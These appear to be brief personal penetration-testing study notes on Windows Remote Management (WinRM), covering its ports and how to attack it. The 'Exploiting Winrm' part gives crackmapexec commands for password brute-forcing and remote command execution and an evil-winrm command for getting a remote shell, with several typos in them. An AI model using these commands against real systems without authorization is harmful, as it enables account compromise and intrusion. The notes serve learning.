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- feature in windoes but not enabled by default
- windows remote mamagement protocol
- remote access to windows via http(s)
- typically 5985 5986
- supports various forms of authentication
Exploiting Winrm
- crackmapexec will be used for bruteforce and execucte commands
- evil-winrm ruby script to obtain reverseshell
- or metasploit module
crackmap exec can be used to know if the port runs winrm - crackmapexec winrm targert-ip -u username -p /password/list
crackmapexec winrm targert-ip -u username -p password -x "command "
evil-winrm ruby script to obtain reverseshell - evil-winrm -u usernmae -p password -i traget=ip
or use winrm module in metasploit - needs retrying